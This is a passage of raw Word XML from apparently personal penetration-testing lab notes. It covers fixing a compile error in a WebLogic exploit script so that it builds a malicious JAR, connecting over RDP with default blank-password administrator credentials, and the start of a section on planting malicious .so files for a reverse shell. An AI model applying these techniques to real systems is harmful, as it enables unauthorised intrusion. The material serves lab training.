          <w:color w:val="ff0000"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="ff0000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Usage: javac &lt;options&gt; &lt;source files&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00003543">
      <w:pPr>
        <w:rPr>
          <w:color w:val="ff0000"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="ff0000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">use --help for a list of possible options</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00003544">
      <w:pPr>
        <w:rPr>
          <w:color w:val="ff0000"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="ff0000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">weblogic/jndi/*.class : no such file or directory</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00003545">
      <w:pPr>
        <w:rPr>
          <w:color w:val="ff0000"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="ff0000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">[*] Uploading JAR file...</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00003546">
      <w:pPr>
        <w:rPr>
          <w:b w:val="1"/>
          <w:color w:val="ff0000"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:color w:val="ff0000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Traceback (most recent call last):</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00003547">
      <w:pPr>
        <w:rPr>
          <w:b w:val="1"/>
          <w:color w:val="ff0000"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:color w:val="ff0000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">  File "/home/kali/48793.py", line 449, in &lt;module&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00003548">
      <w:pPr>
        <w:rPr>
          <w:b w:val="1"/>
          <w:color w:val="ff0000"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:color w:val="ff0000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">    main(sys.argv[1:])</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00003549">
      <w:pPr>
        <w:rPr>
          <w:b w:val="1"/>
          <w:color w:val="ff0000"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:color w:val="ff0000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">    ~~~~^^^^^^^^^^^^^^</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000354A">
      <w:pPr>
        <w:rPr>
          <w:b w:val="1"/>
          <w:color w:val="ff0000"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:color w:val="ff0000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">  File "/home/kali/48793.py", line 416, in main</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000354B">
      <w:pPr>
        <w:rPr>
          <w:b w:val="1"/>
          <w:color w:val="ff0000"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:color w:val="ff0000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">    status_jar = upload_jar(url,headers,valid_cookie,jarname,rel_path)</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000354C">
      <w:pPr>
        <w:rPr>
          <w:b w:val="1"/>
          <w:color w:val="ff0000"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:color w:val="ff0000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">  File "/home/kali/48793.py", line 269, in upload_jar</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000354D">
      <w:pPr>
        <w:rPr>
          <w:b w:val="1"/>
          <w:color w:val="ff0000"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:color w:val="ff0000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">    jar = {'theFile':(jarname,open(jarname, 'rb'))}</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000354E">
      <w:pPr>
        <w:rPr>
          <w:b w:val="1"/>
          <w:color w:val="ff0000"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:color w:val="ff0000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">                              ~~~~^^^^^^^^^^^^^^^</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000354F">
      <w:pPr>
        <w:rPr>
          <w:b w:val="1"/>
          <w:color w:val="ff0000"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:color w:val="ff0000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">FileNotFoundError: [Errno 2] No such file or directory: 'weblogic.jar'</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00003550">
      <w:pPr>
        <w:rPr>
          <w:color w:val="ff0000"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00003551">
      <w:pPr>
        <w:rPr>
          <w:color w:val="ff0000"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00003552">
      <w:pPr>
        <w:rPr>
          <w:color w:val="ff0000"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="ff0000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">What happened?</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00003553">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00003554">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">The exploit failed because the malicious weblogic.jar file was never created. This was caused by a Java compilation error:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00003555">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="570"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="360"/>
        <w:rPr>
          <w:color w:val="ff0000"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="ff0000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">error: release version 7 not supported</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00003556">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00003557">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">This error occurred during the javac --release 7 compilation step, which is used in this line:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00003558">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="605"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="360"/>
        <w:rPr>
          <w:color w:val="ff0000"/>
          <w:u w:val="none"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="ff0000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">cmdCompile = "javac --release 7 " + subdir + "/*.java"</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00003559">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="605"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="360"/>
        <w:rPr>
          <w:color w:val="ff0000"/>
          <w:u w:val="none"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="ff0000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">process = subprocess.call(cmdCompile,shell=True)</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000355A">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000355B">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Since the compilation failed, the .class file was never created, which means jar couldn't package the .class file into weblogic.jar. As a result, when the script tried to upload weblogic.jar, the file simply didn't exist, leading to:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000355C">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="851"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="360"/>
        <w:rPr>
          <w:color w:val="ff0000"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="ff0000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">FileNotFoundError: [Errno 2] No such file or directory: 'weblogic.jar'</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000355D">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000355E">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">So to fix it, just delete "</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="ff0000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">--release 7</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">"</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000355F">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1316"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="360"/>
        <w:rPr>
          <w:u w:val="none"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Replace this: </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="ff0000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">cmdCompile = "javac --release 7 " + subdir + "/*.java"</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00003560">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1316"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="360"/>
        <w:rPr>
          <w:u w:val="none"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">With this:</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="ff0000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> cmdCompile = "javac " + subdir + "/*.java"</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00003561">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00003562">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00003563">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">But the exploit didn't seem to work, although it did run. </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00003564">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00003565">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000035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67">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00003568">
      <w:pPr>
        <w:pStyle w:val="Heading1"/>
        <w:rPr/>
      </w:pPr>
      <w:bookmarkStart w:colFirst="0" w:colLast="0" w:name="_yusaeut9tha5" w:id="477"/>
      <w:bookmarkEnd w:id="477"/>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">RDP</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00003569">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000356A">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">To connect to RDP:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000356B">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="152"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="360"/>
        <w:rPr>
          <w:u w:val="none"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">xfreerdp  /u:[username] /p:[password /v:10.129.233.54</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000356C">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="152"/>
        </w:numPr>
        <w:ind w:left="1440" w:hanging="360"/>
        <w:rPr>
          <w:u w:val="none"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">You can not include the /u: or /p:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000356D">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="2"/>
          <w:numId w:val="152"/>
        </w:numPr>
        <w:ind w:left="2160" w:hanging="360"/>
        <w:rPr>
          <w:u w:val="none"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Especially the /p: if you want to leave password blank</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000356E">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="152"/>
        </w:numPr>
        <w:ind w:left="1440" w:hanging="360"/>
        <w:rPr>
          <w:u w:val="none"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Some default credentials that worked in HTB are administrator:[no password]</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000356F">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00003570">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000035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72">
      <w:pPr>
        <w:pStyle w:val="Heading1"/>
        <w:rPr/>
      </w:pPr>
      <w:bookmarkStart w:colFirst="0" w:colLast="0" w:name="_7nnlwwxzvhw8" w:id="478"/>
      <w:bookmarkEnd w:id="478"/>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Creating malicious .so files for rev shell</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00003573">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00003574">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Multiple times, we've seen cases where a binary tries to load a .so file that doesn't exist, so we add our own malicious .so file.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00003575">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00003576">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">The "</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Adding malicious missing .so file by putting in directory that is part of LD_LIBRARY_PATH path</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">" section in cron jobs displays multiple ways to create malicious .so files, both manually and using a one-liner from msf venom</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00003577">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="619"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="360"/>
        <w:rPr>
          <w:u w:val="none"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">From </w:t>
      </w:r>
      <w:hyperlink r:id="rId1143">
        <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
          <w:rPr>
            <w:color w:val="1155cc"/>
            <w:u w:val="single"/>
            <w:rtl w:val="0"/>
          </w:rPr>
          <w:t xml:space="preserve">Sybaris</w:t>
        </w:r>
      </w:hyperlink>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
